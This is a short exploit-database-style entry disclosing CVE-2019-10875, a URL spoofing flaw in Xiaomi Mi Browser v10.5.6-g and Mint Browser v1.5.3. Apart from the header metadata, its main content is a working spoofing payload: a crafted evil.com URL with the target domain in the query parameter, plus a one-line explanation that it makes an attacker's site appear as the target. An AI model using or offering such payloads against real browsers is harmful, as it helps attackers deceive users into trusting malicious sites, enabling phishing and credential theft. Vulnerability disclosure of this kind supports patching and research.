# Exploit Title: URL Spoofing Exploit for Xiaomi Mi Browser (v10.5.6-g) and Mint Browser (v1.5.3)
# Date         : 11/04/2019
# Exploit Author: Arif Khan (@payloadartist)
# Vendor Homepage: www.xiaomi.com
# Version        : v10.5.6-g and v1.5.3
# Tested On      : MIUI OS, v10.1.3.0
# CVE            : CVE-2019-10875

Exploit: https://www.evil.com/?q=www.target.com

The attacker can thus pass off his site, www.evil.com as www.target.com due to the way Xiaomi browsers handle the query parameter's value.